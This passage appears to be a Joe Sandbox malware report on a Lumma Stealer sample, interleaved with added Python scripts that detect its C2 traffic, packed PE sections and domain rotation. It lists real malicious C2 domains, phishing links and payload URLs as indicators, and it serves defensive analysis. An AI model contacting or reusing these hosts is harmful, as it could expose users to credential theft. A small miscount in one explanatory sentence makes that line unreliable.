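    """Collapse /api<junk> variants to /api and lower-case the host."""
    parts = urlsplit(url)
    path = "/api" if parts.path.startswith("/api") else parts.path
    return f"{parts.scheme}://{parts.netloc.lower()}{path}"


def canonical_c2_urls() -> list:
    """Deduplicated, canonical form of the URLs recovered from memory."""
    return sorted({canonical_c2_url(u) for u in MEMORY_URLS})


def matches_c2(host: str) -> bool:
    """Exact or subdomain match, case-insensitive, trailing dot tolerated."""
    h = host.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in C2_DOMAINS)


def scan_log(lines):
    """Return (hits, ip_only).

    hits: (client, host, kind) for every line whose queried name, TLS SNI
          or HTTP host matches a C2 domain.
    ip_only: clients that only reached the shared Cloudflare IP with a
          non-matching SNI; these need manual review, not an automatic block.
    """
    hits, ip_only = [], []
    for line in lines:
        fields = line.split(maxsplit=4)
        if len(fields) != 5:
            continue
        _, kind, client, target, extra = fields
        host = extra[4:] if kind == "tls" and extra.startswith("sni=") else target
        if matches_c2(host):
            hits.append((client, host.lower().rstrip("."), kind))
        elif target in SHARED_INFRA_IPS:
            ip_only.append(client)
    return hits, ip_only


if __name__ == "__main__":
    print("canonical C2 URLs:", canonical_c2_urls())
    found, review = scan_log(SAMPLE_LOG)
    for client, host, kind in found:
        print(f"HIT  {client} -> {host} via {kind}")
    for client in review:
        print(f"REVIEW {client} reached shared IP without a C2 SNI")
```

Run against the constructed lines, two clients produce domain hits (one by DNS query, one by TLS SNI, one by a case-folded DNS query with a trailing dot) and one client lands in the review list because it only reached the Cloudflare address with an unrelated SNI. Subdomain matching is deliberate: the report lists bare domains, and a stealer operator can move the endpoint under a subdomain without changing the indicator.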
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1545042
                                                  Start date and time:2024-10-30 02:26:05 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 15s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:5
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:file.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 1
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 5800 because there are no executed functions
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
21:26:58 | API Interceptor | 10x Sleep call for process: file.exe modified
Match: 188.114.97.3 (IP)
Associated Sample Name / URL | Detection | Threat Name | Context
zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
rPO-000172483.exe | malicious | FormBook | www.launchdreamidea.xyz/2b9b/
rPO_28102400.exe | malicious | Lokibot | ghcopz.shop/ClarkB/PWS/fre.php
PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT | windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
SR3JZpolPo.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
5Z1WFRMTOXRH6X21Z8NU8.exe | malicious | Unknown | artvisions-autoinsider.com/8bkjdSdfjCe/index.php
PO 4800040256.exe | malicious | FormBook | www.cc101.pro/4hfb/
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/cDXpxO66/download
Instruction_1928.pdf.lnk.download.lnk | malicious | LummaC | tech-tribune.shop/pLQvfD4d5/index.php
WBCDZ4Z3M2667YBDZ5K4.bin.exe | malicious | Unknown | tech-tribune.shop/pLQvfD4d5/index.php
Match: necklacedmny.store (domain)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
file.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer | 188.114.96.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer | 188.114.96.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
Match: CLOUDFLARENETUS (ASN)
Associated Sample Name / URL | Detection | Threat Name | Context
Ndnownts.exe | malicious | Snake Keylogger | 188.114.97.3
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.43.145
completedfiles.....pdf | malicious | Unknown | 104.21.63.172
https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWA | malicious | Unknown | 104.18.86.42
file.exe | malicious | Stealc, Vidar | 172.64.41.3
file.exe | malicious | LummaC | 188.114.97.3
https://mailhotcmhakamloops.wordpress.com/ | malicious | Unknown | 104.17.25.14
https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTT | malicious | Unknown | 188.114.96.3
file.exe | malicious | LummaC | 188.114.96.3
Match: a0e9f5d64349fb13191bc781f81f42e1 (JA3 fingerprint)
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
file.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer | 188.114.97.3
1Ebp0gOgh5.exe | malicious | LummaC | 188.114.97.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer | 188.114.97.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.97.3
NUEVA ORDEN DE COMPRA 73244.xla.xlsx | malicious | Unknown | 188.114.97.3
Dropped Files: No context
                                                  No created / dropped files found
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):6.515036865804577
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:file.exe
                                                  File size:3'001'344 bytes
                                                  MD5:00e4faf579951dedcfe07699f0816ea9
                                                  SHA1:39c1e768620ecd4d0da3b1625a8186377f186f04
                                                  SHA256:61026d58b1772d55debe9e7cf29acf688b23ed1b1eda22f499dde79037bcef8e
                                                  SHA512:d66f98b21cbb97914de799d1477b1e40f9e6ccef167c848a218c535c6cf7ae151a64ce6db5fe0dbdefc66a227095df48ec0c569477efee5a68281af15afb787d
                                                  SSDEEP:49152:XCoJE/k9BApIOO4BnHtpawwbQi7HRUQ2qPad04:yoJEc9BApI74BnrawyQi7HRL2qP20
                                                  TLSH:9DD54A52B44571CBE49E2374852BCD46791E83B90B1448C3AC2DA4FEBEB3DC519FAC68
                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................1......@....@.................................T...h..
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x70e000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, 0x70e000 in section .taggant)
                                                  jmp 00007F79A46FFF4Ah
                                                  rsm
                                                  sub eax, 00000000h
                                                  add cl, ch
                                                  add byte ptr [eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [ebx], al
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], dh
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  and dword ptr [eax], eax
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add ecx, dword ptr [edx]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  pop es
                                                  add byte ptr [eax], 00000000h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  adc byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add eax, 0000000Ah
                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x59000 | 0x340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
The relocation directory is 8 bytes, the size of one IMAGE_BASE_RELOCATION block header with no entries: the image declares DYNAMIC_BASE but carries no relocations for the loader to apply, and no IAT directory is declared for its single import.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x58000 | 0x27e00 | af352a4c89490cfd98df27f9adcf580c | False | 0.9979121767241379 | data | 7.970180597409933 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x340 | 0x400 | 914cd139a383496d0085d499d138ef92 | False | 0.390625 | data | 4.997389973748798 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vsrxmbmz | 0x5b000 | 0x2b2000 | 0x2b1200 | 83798e5364ee2b54560796ab09488b40 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xopfihuh | 0x30d000 | 0x1000 | 0x400 | efa5bcb789badc55844fa768eff13c94 | False | 0.7197265625 | data | 5.787501654543249 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x30e000 | 0x3000 | 0x2200 | 061eeea93e50ec3ceccc7a65b2ff9490 | False | 0.0681295955882353 | DOS executable (COM) | 0.7187436640601623 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x59058 | 0x2e6 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.45417789757412397
DLL | Import
kernel32.dll | lstrcpy
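The section table above is what the report's static signatures key on: a blank section name, every code-bearing section marked writable and executable, a 0x27e00-byte section at entropy 7.97, and an entry point in .taggant rather than in .text. The script below is an added example and not part of the Joe Sandbox report; it reimplements those checks over a PE section table with only the Python standard library and adds a pefile-style import hash to compare against the Import Hash listed above. build_sample_pe() constructs a small image in the same shape (blank-named high-entropy RWX section, a plain .rsrc, entry point in an RWX .taggant); it is not the analysed sample. The 7.0 entropy threshold and the list of "standard" code section names are assumptions, not values from the report.

```python
import hashlib
import math
import struct

STANDARD_CODE_SECTIONS = {".text", ".code", "CODE", "INIT", "PAGE"}  # assumed allowlist
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_MEM_EXECUTE, SCN_MEM_READ, SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
PACKED_ENTROPY = 7.0  # bits per byte (assumed threshold); packed data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes):
    """DOS header -> PE signature -> COFF -> optional header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, hdr)
        chars = struct.unpack_from("<I", image, hdr + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(image[rawptr:rawptr + rawsize])})
    return entry_rva, sections


def triage(image: bytes):
    """Return (entry_section_name, findings); findings is a list of (code, section)."""
    entry_rva, sections = parse_pe(image)
    findings, entry_section = [], None
    for s in sections:
        name = s["name"]
        if not name or not all(0x20 < ord(c) < 0x7F for c in name):
            findings.append(("bad-name", name))       # blank or non-printable name
        if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE:
            findings.append(("rwx", name))            # code that can rewrite itself (unpacking)
        if s["rawsize"] >= 512 and s["entropy"] >= PACKED_ENTROPY:
            findings.append(("high-entropy", name))   # packed or encrypted payload
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = name
    if entry_section is None:
        findings.append(("entry-outside-image", ""))
    elif entry_section not in STANDARD_CODE_SECTIONS:
        findings.append(("entry-nonstandard", entry_section))
    return entry_section, findings


def imphash(imports) -> str:
    """pefile-style import hash of [(dll, [func, ...]), ...]: lower-case, strip the
    .dll/.ocx/.sys suffix, join 'dll.func' with commas, MD5.  Ordinal-only imports
    (which pefile maps through a name table) are not handled here."""
    parts = []
    for dll, funcs in imports:
        base = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if base.endswith(ext):
                base = base[:-len(ext)]
        parts.extend(f"{base}.{f.lower()}" for f in funcs)
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def build_sample_pe() -> bytes:
    """Constructed PE32 image in the report's shape; NOT the analysed sample."""
    rwx = SCN_CNT_INITIALIZED_DATA | SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE
    layout = [  # (name, characteristics, raw bytes)
        (b"", rwx, bytes(range(256)) * 16),                 # uniform bytes: entropy 8.0
        (b".rsrc", SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ, b"\0" * 1024),
        (b".taggant", rwx, b"\xeb\xfe" + b"\0" * 510),      # 'jmp $' stub plus padding
    ]
    va, rawptr, sec_hdrs, bodies, vas = 0x1000, 0x400, b"", b"", []
    for name, chars, data in layout:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), rawptr,
                                0, 0, 0, 0, chars)
        vas.append(va)
        bodies += data
        va += (len(data) + 0xFFF) & ~0xFFF                  # 4 KiB section alignment
        rawptr += len(data)
    # PE32 optional header: magic 0x10B, AddressOfEntryPoint at +16 -> start of .taggant
    opt = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", vas[-1]) + b"\0" * 204
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, len(opt), 0x0102)
    headers = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + sec_hdrs
    return headers.ljust(0x400, b"\0") + bodies
```

Run it on a real file with triage(open(path, "rb").read()); on the constructed image it reports the blank section as bad-name, rwx and high-entropy, .taggant as rwx, and the entry point as entry-nonstandard in .taggant. imphash([("KERNEL32.DLL", ["lstrcpy"])]) reproduces the pefile normalisation for this sample's single import; the "unknown" entropy that the report shows for vsrxmbmz would come out as a number here, since the function reads the raw bytes directly.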
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T02:26:59.580284+0100 | 2057131 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) | 1 | 192.168.2.5 | 54712 | 1.1.1.1 | 53 | UDP
2024-10-30T02:26:59.599684+0100 | 2057129 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) | 1 | 192.168.2.5 | 51374 | 1.1.1.1 | 53 | UDP
2024-10-30T02:26:59.610112+0100 | 2057127 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) | 1 | 192.168.2.5 | 63190 | 1.1.1.1 | 53 | UDP
2024-10-30T02:26:59.622783+0100 | 2057125 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) | 1 | 192.168.2.5 | 63763 | 1.1.1.1 | 53 | UDP
2024-10-30T02:26:59.635028+0100 | 2057123 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) | 1 | 192.168.2.5 | 54886 | 1.1.1.1 | 53 | UDP
2024-10-30T02:27:00.285955+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:00.796437+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:00.796437+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:01.506961+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:01.973958+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:01.973958+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:02.910210+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:04.230056+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49707 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:05.844141+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:07.574027+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:08.044078+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:09.216409+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49710 | 188.114.97.3 | 443 | TCP
2024-10-30T02:27:11.546110+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49711 | 188.114.97.3 | 443 | TCP
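The alert sequence above is the C2 selection pattern these rules are written for: five lookups for distinct .store names inside about 55 ms, then every TLS session goes to the single name that answered (necklacedmny.store on 188.114.97.3, source ports 49704 through 49711, with a check-in and an exfiltration alert on the way). The rules match on a fixed domain list, so each new set of domains needs new SIDs. The detection below is an added example, not part of the report or of the ET ruleset; it correlates DNS and TLS records per source host without any domain list, so the same logic fires on the next rotation. The records are constructed from the timestamps in the alert table (they are not real Suricata EVE output), a second host 192.168.2.7 is invented as benign noise, and the window, count and lifetime thresholds are assumptions to tune per network.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%S.%f%z"
HOST, C2_IP = "192.168.2.5", "188.114.97.3"


def _dns(ts, src, name):
    return {"ts": ts, "src": src, "type": "dns", "rrname": name}


def _tls(ts, src, sni, dest, sport):
    return {"ts": ts, "src": src, "type": "tls", "sni": sni, "dest": dest, "sport": sport}


# Constructed records (not real EVE output); timestamps and names follow the alert table.
SAMPLE_EVENTS = [
    # Five distinct .store names resolved inside ~55 ms
    _dns("2024-10-30T02:26:59.580284+0100", HOST, "presticitpo.store"),
    _dns("2024-10-30T02:26:59.599684+0100", HOST, "crisiwarny.store"),
    _dns("2024-10-30T02:26:59.610112+0100", HOST, "fadehairucw.store"),
    _dns("2024-10-30T02:26:59.622783+0100", HOST, "thumbystriw.store"),
    _dns("2024-10-30T02:26:59.635028+0100", HOST, "necklacedmny.store"),
    # Eight TLS sessions to the one name that answered, consecutive source ports
    *[_tls(ts, HOST, "necklacedmny.store", C2_IP, 49704 + i) for i, ts in enumerate([
        "2024-10-30T02:27:00.285955+0100", "2024-10-30T02:27:01.506961+0100",
        "2024-10-30T02:27:02.910210+0100", "2024-10-30T02:27:04.230056+0100",
        "2024-10-30T02:27:05.844141+0100", "2024-10-30T02:27:07.574027+0100",
        "2024-10-30T02:27:09.216409+0100", "2024-10-30T02:27:11.546110+0100"])],
    # Invented benign host: one lookup and one session, must not alert
    _dns("2024-10-30T02:27:00.000000+0100", "192.168.2.7", "ocsp.digicert.com"),
    _tls("2024-10-30T02:27:00.500000+0100", "192.168.2.7", "ocsp.digicert.com", "192.0.2.10", 50000),
]


def find_domain_rotation(events, window_s=2.0, min_domains=3, min_sessions=3, max_ttl_s=300):
    """Flag a host that resolves >= min_domains distinct names within window_s seconds and
    then opens >= min_sessions TLS sessions (matched by SNI) to any of them within
    max_ttl_s.  Returns one finding per (host, burst); thresholds are assumed defaults."""
    parsed = sorted((dict(e, t=datetime.strptime(e["ts"], TS_FMT)) for e in events),
                    key=lambda e: e["t"])
    by_src = defaultdict(list)
    for e in parsed:
        by_src[e["src"]].append(e)
    findings = []
    for src, evs in by_src.items():
        dns = [e for e in evs if e["type"] == "dns"]
        tls = [e for e in evs if e["type"] == "tls"]
        reported = set()
        for i, first in enumerate(dns):
            limit = first["t"] + timedelta(seconds=window_s)
            burst = {e["rrname"] for e in dns[i:] if e["t"] <= limit}
            if len(burst) < min_domains or burst <= reported:
                continue  # too small, or already covered by an earlier burst
            deadline = first["t"] + timedelta(seconds=max_ttl_s)
            sessions = Counter(e["sni"] for e in tls
                               if e["sni"] in burst and first["t"] <= e["t"] <= deadline)
            chosen = {sni: n for sni, n in sessions.items() if n >= min_sessions}
            if chosen:
                findings.append({"src": src, "burst": sorted(burst), "contacted": chosen,
                                 "dests": sorted({e["dest"] for e in tls if e["sni"] in chosen})})
                reported |= burst
    return findings


if __name__ == "__main__":
    for f in find_domain_rotation(SAMPLE_EVENTS):
        print(f"{f['src']}: resolved {len(f['burst'])} candidates, "
              f"then {f['contacted']} TLS sessions to {f['dests']}")
```

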